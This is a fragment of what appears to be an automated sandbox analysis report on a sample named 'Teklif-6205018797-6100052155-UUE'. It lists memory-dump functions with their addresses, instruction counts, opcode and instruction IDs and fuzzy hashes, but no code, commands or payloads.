                                                          • Opcode ID: 133c9b33c67219cac9870afe1f3e6ab229c7d3212afb6368fb99e7b17a48eccb
                                                          • Instruction ID: 9b089002ce8f88778ebda7e9e9cf2b0a863b197576f1e27a7112a7a75d4a9667
                                                          • Opcode Fuzzy Hash: 133c9b33c67219cac9870afe1f3e6ab229c7d3212afb6368fb99e7b17a48eccb
                                                          • Instruction Fuzzy Hash: BE410470E062089FCB05CFA9D844BEEBBF2BB89315F148069EC09EB251D7756E45CB51
                                                          Function 0593C4D0 Relevance: .1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a08dcbccbc973aa4a7b5081fee9cdc550d28ea4131e5c745f498e8e5accb218
                                                          • Instruction ID: d60a23b5827fbad44699a96504693f45198eebbcfb05935e0b14952964cb1237
                                                          • Opcode Fuzzy Hash: 9a08dcbccbc973aa4a7b5081fee9cdc550d28ea4131e5c745f498e8e5accb218
                                                          • Instruction Fuzzy Hash: FF31E436610504EFCB05DF69D889EA9BBB6FF48321B1640A8E509AB372D731EC55CB40
                                                          Function 05931778 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f6b424ce4babd08ba210d18dd721447421a3a89a4f848d7b0b2742e57823e1
                                                          • Instruction ID: 4646f065ad74d1ff5bda244831c0cd5438dc4a1cc33831aff9a9867deea72f54
                                                          • Opcode Fuzzy Hash: e1f6b424ce4babd08ba210d18dd721447421a3a89a4f848d7b0b2742e57823e1
                                                          • Instruction Fuzzy Hash: 1D419C75A00216CFCB14CFA5C846ABEBBF6FF88704F048429D906EB261D738D945DB91
                                                          Function 0593EEB7 Relevance: .1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 075f04f9e846d71fc4f5a68bb110e4f6f178e5ab8ab52a015d5d619bbc9eb61b
                                                          • Instruction ID: 4cfd10f53d7be299eebf1ac9b28dd22d8353ded15366c3ab70af7a7337425532
                                                          • Opcode Fuzzy Hash: 075f04f9e846d71fc4f5a68bb110e4f6f178e5ab8ab52a015d5d619bbc9eb61b
                                                          • Instruction Fuzzy Hash: DB311A35A00119DBDB04DFA4D955AEEB7BAFF88310F148025E802BB3A4DB75AD15CBA0
                                                          Function 05932130 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 533ca0397631ae0e17f9405ef4acd693eb911df27c223cef160f584c170e733b
                                                          • Instruction ID: 40c9fd48a72911562313878f1ce470bef25e5d031d5b3784631ca71503bec3bc
                                                          • Opcode Fuzzy Hash: 533ca0397631ae0e17f9405ef4acd693eb911df27c223cef160f584c170e733b
                                                          • Instruction Fuzzy Hash: 2841D779A41228CFEB24DB64CD91FA9B7B1BB58310F1141D5EA05AB3A1D631ED81CF50
                                                          Function 0585D618 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 98c28ac4fdf3fc2b3dd15e82faf07dc95bfd6be01bb3e2655553cdff75aabf3d
                                                          • Instruction ID: e51319c21485a4b7b6bbc3d321f9ea468d2de9c7b968e710a6f7df03f63f7e5a
                                                          • Opcode Fuzzy Hash: 98c28ac4fdf3fc2b3dd15e82faf07dc95bfd6be01bb3e2655553cdff75aabf3d
                                                          • Instruction Fuzzy Hash: 23310270E06209CFDB04DFA9D444AEEBBF2BB89320F14C169EC19A7251D7749A46CF91
                                                          Function 0585D179 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6761f7149b2bcf5b568292f797594d0f860a06f7884ef008d2dc384c40de5f4
                                                          • Instruction ID: 6f2d7bf3145b12fbe03fa469ab07f8761f7e80e7fb5bd3ac738213bce81d3b3d
                                                          • Opcode Fuzzy Hash: d6761f7149b2bcf5b568292f797594d0f860a06f7884ef008d2dc384c40de5f4
                                                          • Instruction Fuzzy Hash: 83314674E012099FCB09DFA9E8559EEBBF6FF88310F10846AE806A7365DB315901CF91
                                                          Function 0593A688 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e9a5dbd66cf5b3208c5ed1520bde68d01da4063d5b162adc0745d431f90d10b
                                                          • Instruction ID: 69ea911362b8467b2b692da68582396e9d3f5638ecbe0e51ff4f301022de4160
                                                          • Opcode Fuzzy Hash: 0e9a5dbd66cf5b3208c5ed1520bde68d01da4063d5b162adc0745d431f90d10b
                                                          • Instruction Fuzzy Hash: 1E2192323456009FD724DB6DE885A6ABBEAEFC0325B1A847AE14EC7251DB35EC41C750
                                                          Function 0585DE8C Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80f7123d6bd323cb39106678a9194542376f49a09e3c5fef598c5816dff54053
                                                          • Instruction ID: 62cf143486cd22d4e07f9ac672fb85c9fe1e1285cb49064e2e22c182a6e9e815
                                                          • Opcode Fuzzy Hash: 80f7123d6bd323cb39106678a9194542376f49a09e3c5fef598c5816dff54053
                                                          • Instruction Fuzzy Hash: D831E270906218CFDB14DFA9C844BADBBF2BB4A319F1480A5EC09E7255D774AE86CF01
                                                          Function 0585E508 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9fdd9024d29d0dd1509a800ab3ee13402556d5632dd281b63ea9f606df47e478
                                                          • Instruction ID: 0b2df7ab0e6b36b12e950f86f7a0ddd1fad362fe22ee97b869039677fce8309e
                                                          • Opcode Fuzzy Hash: 9fdd9024d29d0dd1509a800ab3ee13402556d5632dd281b63ea9f606df47e478
                                                          • Instruction Fuzzy Hash: 3E311374E04208CFCB44DFA9D8446AEBBFAFB89314F14C4A9D816A7344EB349A45CF51
                                                          Function 05935FD0 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 965a1050fc38b51b5d863d0634a2625a90227ee8b6abb52613ac481b172d2995
                                                          • Instruction ID: 6d8ee918b62113ba68ba08c86f9a53439bca92639db10dd4b60e98710fabae54
                                                          • Opcode Fuzzy Hash: 965a1050fc38b51b5d863d0634a2625a90227ee8b6abb52613ac481b172d2995
                                                          • Instruction Fuzzy Hash: 46316D35200204EFDF15CF19D98AEAA3BBAFF48305F1481A9F9058B2A1CB75DC95CB90
                                                          Function 0593FC80 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be63719f042476409b78c26b8a7b99a6edc8b7a1406483d64d4a79f28bc82d73
                                                          • Instruction ID: 02f0f386dc8c343aeb3bc0b8d72ca5062c8e2ad5076ffb8cd8d07022613ae4f9
                                                          • Opcode Fuzzy Hash: be63719f042476409b78c26b8a7b99a6edc8b7a1406483d64d4a79f28bc82d73
                                                          • Instruction Fuzzy Hash: B5214474B10A09CFCB00EFA8D5559AEF7B6FFC9700B10416AD506A7360EF74AA46CB91
                                                          Function 0593FC70 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a2e553fd6191f8767f822d4659cb307e16cd65560a65234345d7563dddaa806
                                                          • Instruction ID: 7aaac049d5fdb1e33ccf94cb613b9485ab28ed3950ee42e0eba800bcaab332e6
                                                          • Opcode Fuzzy Hash: 8a2e553fd6191f8767f822d4659cb307e16cd65560a65234345d7563dddaa806
                                                          • Instruction Fuzzy Hash: 05215374B00609CFCB01EF68D455AAEBBB6EF89700F10426AD506EB360DB74A906CBD1
                                                          Function 05933800 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba8495cbbd18a10841afdaea08bb69ab1e9e399d2add956094cbe2bb79195fc0
                                                          • Instruction ID: 3403fe698fce557b59012855f9c0a968bd35e17f63573d1ea832261cf0e7ef79
                                                          • Opcode Fuzzy Hash: ba8495cbbd18a10841afdaea08bb69ab1e9e399d2add956094cbe2bb79195fc0
                                                          • Instruction Fuzzy Hash: 94217F71E40209DFEB10DFB8C505BAEBBF9AF04340F108866D51AD7290E738CA45CB91
                                                          Function 0079A818 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f750198949c70e62779c1366cb1309addca92fbccb8a4933eb21bd6409814dcc
                                                          • Instruction ID: 068a170f599f0e97ba27fed14a51b23dbd769ca676d93285d961907ff65d1742
                                                          • Opcode Fuzzy Hash: f750198949c70e62779c1366cb1309addca92fbccb8a4933eb21bd6409814dcc
                                                          • Instruction Fuzzy Hash: AE21F5B4D06209DFDB48EFAAD8047EEBBF2FB88300F109429D515A3341DB7949468F96
                                                          Function 006BD030 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206103165.00000000006BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6bd000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9064e748f145053e3944b6f641397484f49f46209d6914bb6631a30b6b7e2712
                                                          • Instruction ID: 1572d5dc7664d9055531e4f8f9c314e6b419b2a53fe816214da413dd35eaa525
                                                          • Opcode Fuzzy Hash: 9064e748f145053e3944b6f641397484f49f46209d6914bb6631a30b6b7e2712
                                                          • Instruction Fuzzy Hash: A421FFB15042049FCB15EF18D984BA6BF66EB88314F20C569E9090E246D33AD897DBA2
                                                          Function 059343FA Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be5212ffcb714549e4601cccd4cf7dfa4cf950a27e36d99445424010ccb213e5
                                                          • Instruction ID: ce96e67a2a588c5c49921fc239539ca2099ef46dde37e1a9231b48fa0cab4346
                                                          • Opcode Fuzzy Hash: be5212ffcb714549e4601cccd4cf7dfa4cf950a27e36d99445424010ccb213e5
                                                          • Instruction Fuzzy Hash: 2D216A326001589FCF05DE69C849AEA7BEAFF88251F058166F905DB2A0D735EC61CBA0
                                                          Function 00796680 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58ca95d7dff3afd56611a27959adc110a3552c776453c780183697d7554f2a23
                                                          • Instruction ID: 5d6826c423e139db73a2936911bce30b82c46b10d33303cd2907d3bc12243c10
                                                          • Opcode Fuzzy Hash: 58ca95d7dff3afd56611a27959adc110a3552c776453c780183697d7554f2a23
                                                          • Instruction Fuzzy Hash: 2F215170905508DFDB00EFA8E4487AEBFF1FB59309F1086A6D505A3251D77C4989DF11
                                                          Function 006BD006 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206103165.00000000006BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6bd000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77d9a9f801a7371486d6f466507a39cf47409116b24e1f78481b5a3b96fbc599
                                                          • Instruction ID: f0aeb5adab84160ae52be9c2da24129ad9c811205ad8f6b66aa2fda0672f0b54
                                                          • Opcode Fuzzy Hash: 77d9a9f801a7371486d6f466507a39cf47409116b24e1f78481b5a3b96fbc599
                                                          • Instruction Fuzzy Hash: 08217C7140D3C08FCB03DF24D990755BF72AB46210F2981DBD8858F2A7C33A985ACBA2
                                                          Function 05937DB8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9837024c9e2f2e05a17a5153d9c6bd83279036b1621de47fb86d36a10441edb
                                                          • Instruction ID: bb35a9965169df5931969873382cbc48ab14c19adf714ca54b77a25eb7b0be42
                                                          • Opcode Fuzzy Hash: e9837024c9e2f2e05a17a5153d9c6bd83279036b1621de47fb86d36a10441edb
                                                          • Instruction Fuzzy Hash: 62210475A00209CFCB18DF98D545EDDB7F2FF88311F2041A4E405AB2A1CB36AE44CBA0
                                                          Function 05856C48 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab1b44c4e910ae979200ef68cf793782bf446ecbe6fd31765ca9f9495efb8b6c
                                                          • Instruction ID: da785cd6dd52813024e016449776be0be4580d9ccfcad6b526844263fcef3552
                                                          • Opcode Fuzzy Hash: ab1b44c4e910ae979200ef68cf793782bf446ecbe6fd31765ca9f9495efb8b6c
                                                          • Instruction Fuzzy Hash: EE21F5B0E042099FCB04DFAAD4446AEBBB2FB88310F9485A9DC05A7251E7359E81CF91
                                                          Function 05937DA8 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0a04b94706ea4079a43c5d44dc0596a365617325adeac69ad4c95fb90ce9c27
                                                          • Instruction ID: 6ab722f392b331c9b5d4639bfdf21b0d72717663a2a72024869053ecd3b12072
                                                          • Opcode Fuzzy Hash: d0a04b94706ea4079a43c5d44dc0596a365617325adeac69ad4c95fb90ce9c27
                                                          • Instruction Fuzzy Hash: 99211575A40209CFDB18DF94C586ADDB7F2FF88300F2045A4E405BB2A5DB359E45CBA0
                                                          Function 0079177E Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c56fb86d5ddac6360b4e15c24370b110eeb515a9952fb49e06742e87fae05e68
                                                          • Instruction ID: 03f172a32620aea811165b66e3339369fb1c544f1b13dbd7b3928f0024077527
                                                          • Opcode Fuzzy Hash: c56fb86d5ddac6360b4e15c24370b110eeb515a9952fb49e06742e87fae05e68
                                                          • Instruction Fuzzy Hash: 4721F035A0021A9FCF14CBE4E950BEEBBB1EF89311F2484A6D406AB381CA359D02CB50
                                                          Function 05C79742 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dbcb10781dbc9a14515f21ddeda268ba4a150de3b9f605053cfb9d4c04ca43f
                                                          • Instruction ID: 86ec696212f155e3236b46249595f66df5c517a7f6e9edbdebcde8d44bd4967d
                                                          • Opcode Fuzzy Hash: 6dbcb10781dbc9a14515f21ddeda268ba4a150de3b9f605053cfb9d4c04ca43f
                                                          • Instruction Fuzzy Hash: 4731F474A41229CFCBA4EF58D898BD9BBB2FB89300F1144EAE509A7341DB345E85CF54
                                                          Function 05969D88 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fde8bbf9cb02c0419d303eed29bdd282a8016b0c83abb8d09a43d6bb9c8363e7
                                                          • Instruction ID: 4a794a82ec0651a8c705eb63a5045bc602a2e7295851f4f81174af82f698ea5d
                                                          • Opcode Fuzzy Hash: fde8bbf9cb02c0419d303eed29bdd282a8016b0c83abb8d09a43d6bb9c8363e7
                                                          • Instruction Fuzzy Hash: 03211FB4D082099FCB40CFA9D854BFEBBB2BF4A300F5494A9E005A7291CB745A498F50
                                                          Function 00796690 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47f317dd35e75bb8e5f968d6a00169f7ea0e517c5b288a1d6b0dda3abae107fe
                                                          • Instruction ID: 715f03cdf8b74dc208ff93c0421f59f1fc1681ee8cf57a64ae099db86b147d44
                                                          • Opcode Fuzzy Hash: 47f317dd35e75bb8e5f968d6a00169f7ea0e517c5b288a1d6b0dda3abae107fe
                                                          • Instruction Fuzzy Hash: 152151B0D05608DFDB04EFA8E4487AEBBF1FB49309F2086A6D105A3251D77C4A85CF51
                                                          Function 05C8F4B0 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81700f3088864b204754c7612ac66bc3233a32316246e2c64e76b3824273e46e
                                                          • Instruction ID: 82f2605bbef92c252123a94c87c4ebb0b4132029c3fd59140c4f7daa11bf1ad5
                                                          • Opcode Fuzzy Hash: 81700f3088864b204754c7612ac66bc3233a32316246e2c64e76b3824273e46e
                                                          • Instruction Fuzzy Hash: 2221A5306102059FD754EBA9E845B6EBBEAFF84314F008538E00ADB659DF79AD068B94
                                                          Function 0593689F Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2f6b7571998320e59c770fb713c82721da30504c88466e47cbcc14c6d158629
                                                          • Instruction ID: 56d79a0039c41ce2ffb144f639a10a6da4f3b3166cf24508697fbb6d718673c6
                                                          • Opcode Fuzzy Hash: c2f6b7571998320e59c770fb713c82721da30504c88466e47cbcc14c6d158629
                                                          • Instruction Fuzzy Hash: CA117CB7A05218EFCB15CF98D881CCEBBB9EF98350B054166E405EB254E630EA06CB90
                                                          Function 0596B277 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55620ec6d4abf7265b3e138cd991095954cda793d22ca1db3206f05faba30f04
                                                          • Instruction ID: a654825e6ce473d118f7d25d7e89414f765bb20fe2949428d18267f6f5e78d67
                                                          • Opcode Fuzzy Hash: 55620ec6d4abf7265b3e138cd991095954cda793d22ca1db3206f05faba30f04
                                                          • Instruction Fuzzy Hash: DF219D71D052188BDB18CF6ACC44B99BBF7EFC9300F04C0A9D808A7264EB314A99DF40
                                                          Function 05856C38 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58643f55346a835421ce483080b94001cdb83677ba0e2c2014ed538dbeedf59a
                                                          • Instruction ID: 4850540207266a16cd35ec17f3884af180ae45e9392597cbc3e931788cfa185b
                                                          • Opcode Fuzzy Hash: 58643f55346a835421ce483080b94001cdb83677ba0e2c2014ed538dbeedf59a
                                                          • Instruction Fuzzy Hash: 752147B0D092098FCB44CFAAD4406BEBBF2EB85324F9481AADC05E6251E7354E81CF81
                                                          Function 05969D98 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 292cec15a07bd56d9091e1ee196e553ecb0aae4ac22b6d6c273d21de50a666ba
                                                          • Instruction ID: b89d9204f7327c8ce8aa8c38fed4af38f73a840399116e7c9d9fddda4e13234f
                                                          • Opcode Fuzzy Hash: 292cec15a07bd56d9091e1ee196e553ecb0aae4ac22b6d6c273d21de50a666ba
                                                          • Instruction Fuzzy Hash: E821E0B4D08209DFCB40CFA9D854AFEBBF6BF4A300F509469E109A7251DB749A498F51
                                                          Function 059309B8 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3981c27e61d061906fd9a91bf09157029a3300b363dd276368c78aaac4dc673e
                                                          • Instruction ID: 9df5e2cb099d92dc8d86fcf7f89ed2f459d1daf38ae9a982ac964943c3640403
                                                          • Opcode Fuzzy Hash: 3981c27e61d061906fd9a91bf09157029a3300b363dd276368c78aaac4dc673e
                                                          • Instruction Fuzzy Hash: F4212634A42209DFCB18CB98E599ADEBBF6EF88310F144126E815E73A4DB719D418B90
                                                          Function 05930CF0 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
